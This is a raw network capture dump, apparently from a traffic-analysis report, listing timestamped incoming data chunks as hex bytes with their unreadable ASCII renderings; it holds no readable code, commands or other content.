                                                                                      2023-08-04 16:48:40 UTC1654INData Raw: c1 65 71 74 bd 10 a6 78 f4 8f 09 22 a0 44 63 32 34 85 56 54 2c 29 0e 2a 79 7d 4d 66 37 b5 9f 12 19 30 d9 b2 25 a2 56 88 58 92 5c aa 35 8b 96 a6 02 02 ba b1 6b 7b 83 9a e0 41 34 33 0b ec cd 08 67 e6 9a a9 a0 5e 9c 0b f6 85 0c 28 37 26 88 d3 0a 5b f5 85 09 4b cd e3 14 f0 4d f9 53 69 c2 86 4d 34 23 6b cf 1f af bb 29 90 2a fa f1 b3 bc a6 f6 1e cf 40 ea 4f ea fa 6b 5d 8b 12 43 e9 90 72 7c d4 b9 56 52 0d fa 5b f1 01 db d1 01 79 e5 1c 36 ff 12 f8 58 0d 11 76 ce 6d 0f ca d4 5a 22 d0 99 b9 6d 96 17 ab 9c 22 12 54 e0 9e 7b 15 86 ac d7 23 c7 4e b2 2f a0 1d b6 4a f5 55 9a 5c 89 b7 3e f2 3f 1f a8 b7 45 b3 1f 6f 39 03 71 a3 73 32 ca 2d ec 5d b0 1c 41 60 09 e5 ba 4f 0b bc 25 26 6a 33 05 26 a0 19 da 06 8e de 05 7b 09 e6 d3 40 15 ad 53 48 89 9b cb 22 7d 0d 51 93 15 e2 fd
                                                                                      Data Ascii: eqtx"Dc24VT,)*y}Mf70%VX\5k{A43g^(7&[KMSiM4#k)*@Ok]Cr|VR[y6XvmZ"m"T{#N/JU\>?Eo9qs2-]A`O%&j3&{@SH"}Q
                                                                                      2023-08-04 16:48:40 UTC1658INData Raw: 5e f5 5a 6f c1 b6 c5 25 49 15 2e b4 1f fa 43 e3 a5 47 e9 7d 21 2a 9e 09 fe 41 90 8e 64 58 e8 34 dc 13 06 f5 33 a7 e3 e6 25 31 23 3c f8 42 69 15 c2 d2 4c ee be f7 92 2d 9c a9 92 b7 f6 ac 15 f6 0c 4a cd d9 0d b1 92 c9 b4 7a 14 a2 5b 72 df f3 42 86 3f 3d ba bc 03 1f 79 40 8d ec 41 45 ca e2 c8 3e 8b 7b 53 66 38 48 86 ea 99 4d 76 82 f8 94 42 3f b0 de 75 c6 29 df 2c 78 4f 82 f6 d3 22 02 72 17 d9 ee 1d 73 8d 6b ca a6 8e 9d c8 cc 20 46 6c 6a e8 fb e7 d8 3c 9c 0a fb 5c cb 5a 99 89 a0 61 42 3c 3f 9e 26 47 a6 99 c8 91 27 15 b3 29 c4 44 ba 10 ae 5f 11 9f ba 1e 2b ea f2 f7 1a 8e 96 55 54 42 3a d5 91 ca 0f dd df 72 9c 8b f4 9e e5 88 47 94 f1 13 ba b3 13 79 f8 3d 9b ed 33 05 84 a0 eb 63 bf b8 b2 9c d3 52 96 2c 63 91 f8 d2 11 91 52 3c 2b 54 9d 89 c6 5b d1 ee e8 d5 8d 16
                                                                                      Data Ascii: ^Zo%I.CG}!*AdX43%1#<BiL-Jz[rB?=y@AE>{Sf8HMvB?u),xO"rsk Flj<\ZaB<?&G')D_+UTB:rGy=3cR,cR<+T[
                                                                                      2023-08-04 16:48:40 UTC1662INData Raw: f4 45 91 90 11 c0 e6 69 df 65 27 11 eb a2 6e 17 d4 63 47 a3 64 54 b8 75 c7 ed c5 63 0b 6a 9a c2 2e 6a 28 69 1d 95 07 60 2f 74 eb a5 f8 29 7e 35 e9 68 3f fd 7c cb d0 83 4f a9 fd 39 ea f7 e1 91 40 d7 c4 da c7 bf d5 01 27 c0 e7 b4 e9 b1 f6 80 70 e4 5b cb fb 75 5f 74 c3 50 df ee 89 ca 70 6f d4 a2 f0 33 c8 ef 72 ec 6a 61 82 fc a6 88 7d ea 4a cf 3d b5 15 14 57 e4 48 6f af 4e 99 d0 cd 72 8e 30 e9 78 09 43 11 65 ce 81 55 2e a3 64 ba fe d6 42 98 67 85 1d 2d 1a 3b a1 59 10 ab e9 00 7a e3 49 4e 7d 85 50 b4 b1 9a d3 35 51 65 63 ba 66 e3 66 23 90 2d f6 05 bf 21 41 7d 3a 41 e2 3c 1b 90 af f5 65 01 20 fc ea 1c c3 cf 4a 33 40 c5 7e 04 d9 56 b8 59 b0 c7 3d 21 e2 2f 9f 9b bc dd cf 37 86 9f ba 28 34 3f 6d 77 5a 34 54 52 38 df 82 f4 0d 93 ba 71 c6 21 6b a5 11 28 8c 57 43 bc
                                                                                      Data Ascii: Eie'ncGdTucj.j(i`/t)~5h?|O9@'p[u_tPpo3rja}J=WHoNr0xCeU.dBg-;YzIN}P5Qecff#-!A}:A<e J3@~VY=!/7(4?mwZ4TR8q!k(WC
                                                                                      2023-08-04 16:48:40 UTC1666INData Raw: 5d 73 03 e2 88 14 cf 01 c3 6f 7f bc 7b 06 a2 af d1 f1 fd 56 f7 03 e7 d9 6a 9e 7e 8b d0 ac 3f e0 51 0a 40 3e 00 b3 68 0e 6e 39 a7 92 bd 74 cf b2 96 3c fe 3a 59 b0 32 7e fc 6c 2c ef 34 97 0b b6 52 8f 93 39 10 a7 64 f2 f1 53 03 66 95 9b c6 36 34 1a bc 9f db fd 83 4c e8 7d 8d cf 3a 6c 37 76 16 61 76 68 0a 5d 8c 0d a5 30 2b 64 30 3d 3f 63 c1 62 a3 86 a1 df 53 b9 14 63 60 5e b6 56 97 db 55 7d 50 55 b5 f9 c8 4d 49 e2 8f 58 a0 60 ba 1b c6 9d d1 ea aa cf 45 2b 50 bd c5 32 2c c9 c1 3f 11 78 e3 c5 1f ae 15 73 b6 3d 96 93 2d 5e a5 b4 ec 2f f5 9a 2b 89 da b1 4e 92 fe 00 47 d1 88 6d 29 1c a7 91 28 28 e4 09 d9 5f bc 81 c9 4b bc a0 e4 62 dc d5 3c e8 e1 00 38 fc 72 b0 e5 89 25 c3 74 af 84 00 f8 83 90 d4 cd b3 80 c7 79 c3 80 5b 01 e4 c7 01 03 c4 dc a0 4c 6b 4a a1 32 8a b7
                                                                                      Data Ascii: ]so{Vj~?Q@>hn9t<:Y2~l,4R9dSf64L}:l7vavh]0+d0=?cbSc`^VU}PUMIX`E+P2,?xs=-^/+NGm)((_Kb<8r%ty[LkJ2
                                                                                      2023-08-04 16:48:40 UTC1670INData Raw: 1a dc 9e dc a4 c5 67 a9 34 e0 d2 f7 d9 69 f8 90 a8 fe 82 20 0e ee bf d2 84 2d 50 25 c3 c8 2b 97 d2 ba cf d1 4a 99 fc 83 8c 6c 33 f1 f3 b7 5c 94 c5 3d 05 ec a9 b1 4f 04 e3 0a 90 41 79 e5 68 b3 3f 41 9b 09 33 fe 44 e1 9f 64 0c 25 7a c5 ca 92 2a 84 8a 2e 16 37 de 85 52 cc e3 da 13 48 0c 90 ac b9 53 81 f3 93 07 3a e7 59 b1 1b c2 b2 10 03 f7 5a 26 f7 ce 49 07 6f ad d6 ab 58 61 4a 2a 25 4e 68 0e 96 83 2f de d7 01 0b ed 58 91 88 71 a1 25 da 6d 59 4c ca 98 d3 33 ea 6b ba d5 ba 86 86 a7 6d d2 dc 55 1a e5 0f d3 a7 97 c7 46 c3 e8 36 1a f3 1f 6f 17 c6 29 cd 0e 8d 70 a2 95 75 4b bc 72 08 a3 8b b4 24 2c aa eb 78 1a 0b 9c 1c 28 c1 00 59 a4 c3 d8 22 fb c1 3f 01 87 0c dc 02 c3 b1 20 7b c3 d3 39 21 55 1b 84 46 cf 82 b1 fe a1 1f c4 df 45 e9 1e 75 d1 ff c1 7d 46 f3 b8 d4 9c
                                                                                      Data Ascii: g4i -P%+Jl3\=OAyh?A3Dd%z*.7RHS:YZ&IoXaJ*%Nh/Xq%mYL3kmUF6o)puKr$,x(Y"? {9!UFEu}F
                                                                                      2023-08-04 16:48:40 UTC1674INData Raw: d9 0e 77 38 f9 65 33 7b 48 d0 e6 e8 a8 59 f5 53 87 03 f2 17 3d 35 0b 6a 50 77 1c 54 19 cf 63 15 10 26 42 10 6e 6b 4d 85 7b a6 bf 9d 59 1e 0b a3 99 8b f5 e5 dd 41 86 74 7d d4 bd d1 68 f1 fb 7a ba 72 d7 46 7c 54 34 5c f2 e2 18 44 27 4b bf 8c 40 66 33 d1 02 8f 38 15 c2 76 2a a9 aa ee 5e ba 1e b8 b1 5d 1f 40 01 66 d9 24 f7 a0 99 09 32 2e d7 bf 17 16 6e ec 1b e2 d6 ba 73 da b7 04 42 45 cc ab 36 81 44 7f 7e 92 f4 b6 12 43 eb c8 89 7d 70 28 6b 81 dc b4 a9 f1 38 67 29 0a 5c cb fe b8 5d e0 44 67 00 12 42 b9 9d a2 8d 89 a3 ae aa 30 10 d0 82 62 e9 09 4f 75 a8 ba b5 fa 51 53 28 23 9e 7c e3 c5 97 92 70 68 be 89 67 ad 7d 9f 02 9e 6a 03 d3 fb ff 0a 23 a0 46 13 0b 92 6f 64 79 2d 41 5e 61 94 7a ae 1d b3 06 25 3c b4 71 d1 41 40 f1 90 88 f1 c2 e7 ba 55 1a f5 c6 6e 7c 5c 80
                                                                                      Data Ascii: w8e3{HYS=5jPwTc&BnkM{YAt}hzrF|T4\D'K@f38v*^]@f$2.nsBE6D~C}p(k8g)\]DgB0bOuQS(#|phg}j#Fody-A^az%<qA@Un|\
                                                                                      2023-08-04 16:48:40 UTC1678INData Raw: bd 51 4a d2 1d 35 90 7a 37 7f fa e3 fd 1a 24 a9 e9 57 7e 30 34 63 75 b1 8a f8 14 d2 e2 2e 6f 58 10 6f 41 ee d4 80 a5 2c a1 05 1e f5 86 e4 63 1c 1a 18 c4 9d 83 48 e4 2b fa 2a 96 0a c2 46 5b ad 8f 37 b7 57 53 2f 99 3e 7f cf 97 09 8b 04 75 71 c5 12 a7 d1 c2 33 fd 5a f5 ff 99 d3 09 4c ba ce c5 f2 3c b1 50 27 0b 09 dc fe b4 c0 7e 8b d1 40 65 ac fe f1 7f bf d5 73 d1 b6 86 bd 3c 8d 3b 7d 9f cc 50 09 7c 62 fb 90 2a 15 15 6a 8c cc 25 d9 ce ff 84 cb 99 37 b5 6a cd a6 4c ec f3 7f 79 a1 12 5a c7 b4 85 2c 3a 50 93 76 f8 00 f2 e8 53 5d d7 f5 64 6e a4 62 91 d7 b3 5e e7 b5 f5 cf 08 15 4a 83 16 2f d2 03 3a 3c 14 24 31 17 57 e9 8a 18 85 63 55 35 96 54 4f 92 e8 c2 6a af 46 da 32 e1 cc d1 9d 7b 41 0e 8f 85 40 49 87 bc fa 01 f5 75 67 98 de 2c 75 3e 32 e3 75 01 39 f6 00 43 72
                                                                                      Data Ascii: QJ5z7$W~04cu.oXoA,cH+*F[7WS/>uq3ZL<P'~@es<;}P|b*j%7jLyZ,:PvS]dnb^J/:<$1WcU5TOjF2{A@Iug,u>2u9Cr
                                                                                      2023-08-04 16:48:40 UTC1682INData Raw: 36 38 6e ce 25 96 16 d9 10 05 5a 9b f9 a6 b0 23 24 c7 4b 08 f3 9b 8d 34 f2 44 d1 a2 92 4c 91 da 27 89 3d 46 19 49 17 38 17 4f 68 48 31 b7 47 8f af b5 a3 d6 6e e5 60 84 73 30 22 86 0b a2 44 6d 31 3f 3d 5e 5f 93 6b 8d f8 b2 04 06 1d 64 0b f7 d7 7d 0d 9b 98 35 a4 18 62 50 12 03 a2 11 40 21 03 d9 f0 ef 6c ac 1d 04 0d 15 82 df 88 1f bd ee 86 c7 cd 02 f0 1f ed e4 49 e0 d8 ee f4 2f 4e 0d 54 fa 90 59 c3 04 78 80 16 01 d8 1e 65 a5 1a d2 9c 90 6e 74 c4 1b c6 57 22 f3 9b 27 a9 91 77 73 34 fe d4 93 b3 d2 75 3e e4 3a 7a 0b bc d6 cc 6d eb 01 c7 a5 ec e3 32 8d e5 92 ce 8a 92 3f 61 0f 03 47 99 bf 35 45 a9 aa a0 79 1a 29 bd a9 40 fd dc eb 15 fd 11 ba 79 78 7b 0c 8b 84 fe 5f e6 d3 87 ac ff 23 1f 71 72 a8 52 a4 ce 84 55 3b 3b ad 63 df de 2b 11 3e 4f 49 30 11 5f a8 cd 5f 92
                                                                                      Data Ascii: 68n%Z#$K4DL'=FI8OhH1Gn`s0"Dm1?=^_kd}5bP@!lI/NTYxentW"'ws4u>:zm2?aG5Ey)@yx{_#qrRU;;c+>OI0__
                                                                                      2023-08-04 16:48:40 UTC1686INData Raw: ca 32 aa 2b dd 27 dc 51 96 3c 27 84 43 ae 55 39 1e 12 04 50 c2 10 28 04 5b ae 8f 52 5c f1 c6 4d 6e 6b fb 48 fc 7c 93 9e 83 a3 af ac a5 6b 81 41 d3 80 5d 95 b2 c6 a0 f5 0d 82 31 b8 89 de 05 6f 14 ec ef 48 3b b3 20 c4 14 27 c7 97 ec 86 b7 1a 2a 88 ad b6 af 9c d8 16 1f c6 b2 ae 88 be 9e 37 d6 57 b4 d5 69 cc e0 b6 78 45 5a 3b 21 62 fe 32 02 5d d7 5a 8a a9 3d b7 09 35 ff af 5f 98 43 aa 56 21 77 2f 58 82 2d 1a 64 6b 82 e9 d6 75 87 1f 41 a8 95 b3 64 84 47 9e 02 b1 63 3a 3c 93 6b 06 a8 04 1d 7e 7e 70 01 ac 75 df 31 db 39 47 c1 d4 5f a6 e7 fd 27 7e ce f6 f8 0c 06 3c 96 2f 0f 36 e3 b4 99 2f 53 b9 e5 f0 d3 e1 ed 59 3b f1 e8 3f 68 b3 83 f4 cd 05 57 6f 54 be a0 7d 55 1b a2 8a 49 13 7f fd 35 de 0b 80 c4 9b 3a 6d 66 de 83 1c cc 6d be 8e 42 71 e9 7e 12 27 9e 44 fb b8 d1
                                                                                      Data Ascii: 2+'Q<'CU9P([R\MnkH|kA]1oH; '*7WixEZ;!b2]Z=5_CV!w/X-dkuAdGc:<k~~pu19G_'~</6/SY;?hWoT}UI5:mfmBq~'D
                                                                                      2023-08-04 16:48:40 UTC1690INData Raw: f6 49 98 34 30 84 70 0c 7d a2 6b 7c b1 b8 bc f2 44 b9 66 af 6e 5c 26 dc 88 05 e4 f9 14 0d ca 22 66 ce 1c 08 20 24 d4 e9 83 e4 36 ed 62 5f 3a c2 7a 92 95 f4 fd 09 c0 5c 0e 30 e6 04 c0 6d 0c 1a 91 ab ea 96 4b 5f 46 8c bd 41 88 77 69 92 74 1b 12 8f a1 7e 7f 77 66 7d ac 4f fb df a7 2d 87 a0 1a d2 5c 53 b0 ed 8f 10 a5 f9 0c 87 f3 32 b9 52 58 37 ed 7f 00 dd 94 3b 53 d2 5d 40 51 30 8a 13 57 d1 6c 6b 0e fd 3c 4a 8f 6f e6 32 c1 90 72 d9 70 5a 25 a1 92 a2 ed 6e 2e 33 4b 9f 21 0c 89 ad 0c 77 99 f8 a0 1b b2 60 42 ea 0f 1f ce 34 87 f1 79 d4 83 cf ce 8e 44 e9 72 b7 a1 1f 64 be 97 ef 94 56 68 13 25 ec 2b f9 a3 cd 71 f7 a5 9b b0 08 99 4c 2c 61 40 46 e2 ad 5d e3 96 be f0 01 55 47 54 1f c1 8b d4 f3 eb 89 46 2a f6 77 2b 57 99 5d 5b 5d 55 c9 25 38 14 16 55 e5 cd e5 c5 27 cb
                                                                                      Data Ascii: I40p}k|Dfn\&"f $6b_:z\0mK_FAwit~wf}O-\S2RX7;S]@Q0Wlk<Jo2rpZ%n.3K!w`B4yDrdVh%+qL,a@F]UGTF*w+W][]U%8U'
                                                                                      2023-08-04 16:48:40 UTC1694INData Raw: 97 43 b3 42 18 4a 88 0b 90 6c 5a b6 ec 91 a7 37 40 3e 05 05 e9 30 74 ec e7 ee 6a 79 ce 96 34 a7 90 86 4a e3 12 2d 9d 3e 63 3d 64 39 43 bc 54 c1 04 a5 6b 17 35 11 d1 17 53 95 5c 90 bb 5e b3 5b 48 32 cd 43 52 7d 5a 4c 53 86 39 8e 43 99 33 e3 1e d6 b3 e5 18 aa 81 99 ec 37 56 2b 79 d1 39 eb 72 cd eb c9 e0 e0 3b 5b bf 4f b8 a5 b4 79 db 6a 2c 86 15 bb 16 ce 2c 81 68 b8 d1 94 31 fa 77 78 2c 88 6d e4 f1 1a d0 97 95 9b 7f fd 49 a7 04 3b 0c f1 9a f3 9f 77 89 4b d8 27 78 e9 c0 cb 34 9d d2 19 bf 7d 59 2a 5c e4 d0 09 20 40 26 b2 e0 dc 50 14 f8 33 7b a7 5f 3c 45 32 bf 58 a1 cf 1a 3f 09 b2 1d b2 5f 8f 4f 70 14 51 6c 4e ba ac 35 fd 66 be 1c db f0 db c5 e5 3e 09 72 ac 57 d1 59 3c bb f4 52 c0 fb 8d 92 bd eb b3 5c 93 b1 31 40 83 1b c7 3a b6 56 ef 71 7a 76 d0 d0 f0 9b d2 f3
                                                                                      Data Ascii: CBJlZ7@>0tjy4J->c=d9CTk5S\^[H2CR}ZLS9C37V+y9r;[Oyj,,h1wx,mI;wK'x4}Y*\ @&P3{_<E2X?_OpQlN5f>rWY<R\1@:Vqzv
                                                                                      2023-08-04 16:48:40 UTC1698INData Raw: 60 dc c7 59 28 21 9d 1a af 22 77 77 79 47 a5 5a 80 fe 0a 7b 3b 76 93 2c ff 3e 4c 28 0f 8e 9f 2c 00 2b b8 d8 27 82 b2 07 ab 1f 20 c6 ec 54 00 09 57 95 42 8c 12 dd a7 1f 8e 93 15 1f bb ee cf a2 fb ce f1 ca 85 fd 1f ae 7a da 31 3e 9d a6 36 cf 68 c2 3b 6e 34 56 18 ce 8d 0c d9 43 38 b2 16 66 60 e6 69 13 80 1d 78 ab ad ff 98 ba af d4 d8 61 f0 dd 6c 93 67 5d 51 47 a4 d9 d4 9d 8d b0 09 13 a3 9a 1f c7 85 d9 3c b5 4b 21 18 f1 45 f2 1d e5 0f e5 a7 01 f7 7f f1 50 08 89 67 51 c2 c1 43 fc f5 25 01 35 3b 2a f2 c7 a8 21 b5 99 22 c4 ce 21 b7 6d 6d 4c f3 0a 3a f2 2e fb 90 ce 7a 30 2e 07 3d e7 d7 4e 4d a3 3d 36 06 f7 c4 4b af 5a 61 24 01 0b 43 ad 1f 44 2e e2 1a 6f 13 30 52 3d 47 26 0e 30 75 81 84 98 07 dc 8d 8d e1 20 3c 5e 90 3e a2 7a 1a 75 aa c0 f0 74 af 2c 5b 94 10 1f 44
                                                                                      Data Ascii: `Y(!"wwyGZ{;v,>L(,+' TWBz1>6h;n4VC8f`ixalg]QG<K!EPgQC%5;*!"!mmL:.z0.=NM=6KZa$CD.o0R=G&0u <^>zut,[D
                                                                                      2023-08-04 16:48:40 UTC1702INData Raw: 72 95 4e c7 65 89 a0 52 71 2f 86 04 91 a2 1d 5a 0e 5a 0c 3f a4 98 24 1c c3 16 6b 7d 55 86 4d 49 e8 72 70 9a ab 29 35 f6 b1 5f 11 fb f9 c8 e7 19 1f 98 50 15 9f 8a 11 02 39 6b 0f 48 dd 86 2f c1 d9 79 8a 3e 28 57 3d d4 6a ce f2 00 ff ac 5c f1 3e 5f fb 1e 0e 08 a6 7f d0 65 c3 06 52 53 a0 dd c9 9f 41 ef 47 7d 6b 0d f0 91 45 26 23 d7 a2 2b 7c 7c dc b3 44 2e 35 38 5c 26 60 0d 38 e4 cc af dd c6 13 36 44 4a f5 a3 db 16 59 a5 31 3a aa b0 0d 10 0f 95 d5 f0 ab 20 24 69 9a 90 ce 76 6a bc 60 8f 66 0b 76 2d 52 e1 90 97 73 03 f0 2e 34 49 34 36 bf 09 c6 30 b7 cc 69 f5 b0 33 1d 52 36 db 2b 64 46 91 fe a2 f2 52 be f6 3f 7b 98 8f 04 b1 49 33 ec 5d 25 79 06 e3 60 90 34 9a 56 78 d7 59 58 bd 07 07 19 84 f6 df 9e 47 87 92 ac 74 66 ac da 59 78 7a 90 0f 91 cd 98 8a 69 aa 2a 10 09
                                                                                      Data Ascii: rNeRq/ZZ?$k}UMIrp)5_P9kH/y>(W=j\>_eRSAG}kE&#+||D.58\&`86DJY1: $ivj`fv-Rs.4I460i3R6+dFR?{I3]%y`4VxYXGtfYxzi*
                                                                                      2023-08-04 16:48:40 UTC1706INData Raw: 42 95 52 99 0b 97 40 63 2d c9 16 82 18 e2 73 e9 40 6e a7 75 c9 b7 7d 3d 65 5c 0b 1c b1 64 e5 cb fe fc f7 8a 70 47 5b 0d c2 c9 85 17 ef 11 bc 3d 1b fc 72 2a c2 9e 2a 54 13 2a e8 b7 fc 91 6d 2c 11 79 d5 99 1c 48 51 41 29 ce ed 17 e2 c1 26 1a 71 0e a4 ad 47 80 f3 f4 fc 69 75 40 11 35 89 55 9d f3 f4 a2 57 e8 3f 89 31 ac 23 9d 3f 4a aa 6a b6 fe dc ef 86 2a e3 ce b4 a3 ae 9f fb 5f 45 b7 56 58 e3 d6 d0 10 5f 40 b0 e2 3b c6 dc 07 0a 76 a4 e6 98 45 6a 4e 7e c9 5b 89 60 11 7a 44 19 81 26 c9 35 ad 94 a8 3a 96 35 49 b1 71 b7 1a 04 2e ea 7f 55 c3 be cd d7 ff 90 91 a2 d9 19 55 22 a9 39 bd 9b a8 c1 94 cd 8f 0d ba ec b7 82 e8 96 9f 66 91 5a 58 b1 1b 6c 2d 88 a4 f4 92 5b 97 a2 8d 0a c6 76 99 e4 3f 30 1f f7 8e e4 07 8d 1c 9f b3 e3 e9 2c f4 0f d6 a6 4c ef da 48 94 08 75 20
                                                                                      Data Ascii: BR@c-s@nu}=e\dpG[=r**T*m,yHQA)&qGiu@5UW?1#?Jj*_EVX_@;vEjN~[`zD&5:5Iq.UU"9fZXl-[v?0,LHu
                                                                                      2023-08-04 16:48:40 UTC1710INData Raw: 25 d8 58 0e 66 c3 da 34 8e a3 c9 e2 d4 63 1d 62 f3 1a d0 6b 36 16 f0 a5 ae f8 f0 ca 58 58 73 ed ff a5 cb bc c8 64 25 66 a4 64 a6 df b4 8b 7f 5a 8f 44 a6 f7 68 0a f9 73 82 29 fd bd fb 97 df b8 df 11 c6 5c c3 b7 c2 b8 68 2a 44 ea d4 b0 b1 09 11 27 bd 0e 2e 9a 8a e9 c3 55 66 73 c8 37 b3 1a 5a 5c 55 dc 2a 21 16 2f ee d6 19 31 10 a5 ca ef e7 26 af 28 d1 25 81 b6 aa f5 8f ac 48 b7 89 d6 c4 37 dd 31 5f e7 1e ac 3c 9e 0f d4 b4 14 54 56 c3 8d ae f8 81 ee 79 f1 66 07 95 5c 37 bc a6 cf 2a 65 58 4c 39 05 4a 77 bc 56 35 e0 53 84 41 3e 66 38 76 00 94 40 55 d1 7c 61 3b 3b c2 d1 19 1a d7 f4 a5 89 59 02 18 7a 5e 4e ef 9c b2 93 4f 7d 8d 44 62 91 ca 3f a8 a2 4e fe 56 16 0a 9b bc e0 9a b4 9b 16 a8 4f d5 93 11 a4 e3 31 ff e6 94 07 7e 20 88 b7 bb 31 c4 cd 7f a4 01 c7 67 27 84
                                                                                      Data Ascii: %Xf4cbk6XXsd%fdZDhs)\h*D'.Ufs7Z\U*!/1&(%H71_<TVyf\7*eXL9JwV5SA>f8v@U|a;;Yz^NO}Db?NVO1~ 1g'
                                                                                      2023-08-04 16:48:40 UTC1714INData Raw: 1e f3 16 a3 6c f4 ad c8 47 3a 37 5f 0f 64 74 97 74 82 32 3a 7c 77 f5 30 df 87 6f f4 a7 49 cb ea 89 bb dd 50 67 1d 38 8f 30 55 dc f8 91 23 f6 28 ec 24 68 3f 02 c9 c4 8e e8 b4 88 b2 24 45 f2 9c af e1 88 b3 1f 9e fb f9 e4 75 c7 a9 e3 49 4e cf 50 c9 41 5e 3a 34 69 9c 33 c4 72 da f8 f3 5f f8 03 f0 9a 68 8f 43 c9 77 ac 30 66 35 a8 cd de fe 11 f9 c7 12 ac c1 55 03 3b b7 ff f6 a9 64 90 6b 95 da 61 30 69 44 30 4e ce 63 18 c7 42 64 81 e9 c4 3b 18 3e cb c3 68 52 93 f5 ee 16 04 fc 70 e9 9e 1e 8b 24 60 78 3d 16 d0 5f 65 e0 0c 9c 01 7f 57 dc 35 ce 0f 70 74 11 bd 37 b9 73 6f 97 c6 07 3d b7 34 e6 8c 5e 66 c6 a9 6a 92 76 ee bc 1e a8 46 0d e4 66 4d 05 96 dc 37 b0 75 ff 6d 45 08 a2 35 ab a5 27 44 fd 09 db ff ed e5 66 9c 83 67 aa 26 27 e9 1b 20 ec ea 56 05 50 81 0e 4a 31 04
                                                                                      Data Ascii: lG:7_dtt2:|w0oIPg80U#($h?$EuINPA^:4i3r_hCw0f5U;dka0iD0NcBd;>hRp$`x=_eW5pt7so=4^fjvFfM7umE5'Dfg&' VPJ1
                                                                                      2023-08-04 16:48:40 UTC1718INData Raw: 09 23 3c 15 03 6d 78 e1 70 55 a5 aa 9e 2f d8 1b 14 16 65 10 27 d6 d4 fb 06 24 63 4e ea 07 93 20 10 5a 28 49 5c b7 da dc 25 ce b3 10 38 41 61 5d 53 de 71 4f fe 56 b3 50 d7 f7 4e 12 c4 85 1d db f4 5d ee f8 ed ae fe 26 d0 63 90 7b 38 f7 1a b0 25 d9 a5 b4 a0 2d 98 53 c4 a9 17 39 b1 92 1e 48 31 91 ff df 2c bf d0 57 27 ca 89 e9 cd 9b 57 b2 d4 75 10 de 34 20 34 a6 c0 15 cf 39 ea 52 93 cc a9 65 26 28 6c c8 83 ce bd 96 1c e0 b3 d9 be e5 a6 98 0e 12 e8 0f 7e 56 13 bb 21 d9 b7 f3 0e e7 f2 72 e4 f0 2b b2 a6 63 ce 9d 8f 69 c6 a7 a5 49 7b 6d 2c 24 f9 0c 34 6e f8 26 0e da 10 83 65 c8 f3 95 2c 65 78 f0 87 d9 80 3c f5 89 94 7e 68 e3 02 01 92 39 ff 02 46 2e 8e de e1 57 09 eb 58 6b 0b fc 36 7d 36 c2 2d 3c 22 58 d7 b2 1a 06 2b b8 02 82 d3 c9 58 30 0e 4e e1 60 d0 ef 0a c2 40
                                                                                      Data Ascii: #<mxpU/e'$cN Z(I\%8Aa]SqOVPN]&c{8%-S9H1,W'Wu4 49Re&(l~V!r+ciI{m,$4n&e,ex<~h9F.WXk6}6-<"X+X0N`@
                                                                                      2023-08-04 16:48:40 UTC1722INData Raw: 0f 53 60 66 46 15 7f 6b 64 f3 bd 02 71 4d ad 84 1d cf 3a 5b 18 3c 0e 5d c1 ca 0c d1 f7 8e 18 4b f0 e3 ca 4f de fc 3c 7c f4 e1 23 9a 9c 7a 65 4c d2 ea b4 d2 65 56 98 5a 83 52 e8 ce ba e6 64 0a 54 a0 7e 5c 55 07 76 64 d2 94 21 d8 29 3d e0 cb 0f 9a 10 d0 fa 80 b3 7e 47 b9 f7 a9 e0 ac b3 12 ee 0f 4e 22 29 43 f9 63 e0 94 e0 35 a7 a5 5b c9 31 d8 90 82 22 af a2 f0 12 0d a5 de 4b 50 f5 59 09 21 f0 64 9c f2 7d 4b 98 cf 63 7a f6 86 1c dd 34 a9 bb 65 fd c9 19 1c 44 7a 3b 73 83 d4 db 3e 66 1f 4e a8 8b 87 f6 74 7a 9a 74 7a a3 6f e7 95 b9 98 0f 44 65 5d 14 cf 75 51 db a9 52 27 d6 03 44 1f dc ea f1 da f8 3e 44 cd a3 df 56 53 ee 13 db 08 62 37 61 45 59 cc 87 ea 5d d7 f6 12 6f ed bc 72 0f d9 2f a7 70 be 3f fe 9c 97 4c ed 87 8f 6e c0 b9 4a 65 2e de 19 f1 a2 c2 de bd 29 4f
                                                                                      Data Ascii: S`fFkdqM:[<]KO<|#zeLeVZRdT~\Uvd!)=~GN")Cc5[1"KPY!d}Kcz4eDz;s>fNtztzoDe]uQR'D>DVSb7aEY]or/p?LnJe.)O
                                                                                      2023-08-04 16:48:40 UTC1726INData Raw: cb c9 92 4a b4 bf 1e 5a 44 23 26 ec e9 57 13 09 cf fb f9 85 af 8c 8f 44 68 c4 ef a5 04 89 b1 b7 a3 dd 28 c7 f4 ab 4a 08 39 22 db 9b 75 2b 15 bf 7d 5c 30 8b 26 1b 77 0d b8 db b2 11 1d 64 fb b2 be 4d 5b 00 29 06 35 92 25 b7 d5 65 fc d8 b9 02 19 c1 dc 2f 46 44 1e 3d 18 b2 f2 c5 06 ba 5f cb 6c 9f bd 54 01 78 d5 30 c7 51 43 db 7b 0b 74 3b f5 36 b5 fd 91 77 9e 5e 97 7a eb d2 d1 e4 d8 ad 5d e0 64 ff f8 ea 76 cb 45 3a 26 a3 d6 9e 67 a2 cb 44 60 2f 93 74 f2 3a 20 f8 67 e8 6d f0 b6 bc 56 c7 47 d8 4d d8 55 4b ff 32 de f6 db 24 56 7d d4 62 7f 51 1b 97 fa 17 9b d5 af f0 79 db 7d 73 4a ef 3d 7a ba b4 68 d9 8f 12 c4 8e 42 33 a5 f1 01 66 a9 b3 88 96 62 d0 8f 35 8a 2e fb 59 47 49 d1 13 06 1a 8c c9 61 e5 f9 e7 63 f6 58 c0 1d a8 da 81 8f df ae 20 64 5a cb 7e d4 c7 26 ab ba
                                                                                      Data Ascii: JZD#&WDh(J9"u+}\0&wdM[)5%e/FD=_lTx0QC{t;6w^z]dvE:&gD`/t: gmVGMUK2$V}bQy}sJ=zhB3fb5.YGIacX dZ~&
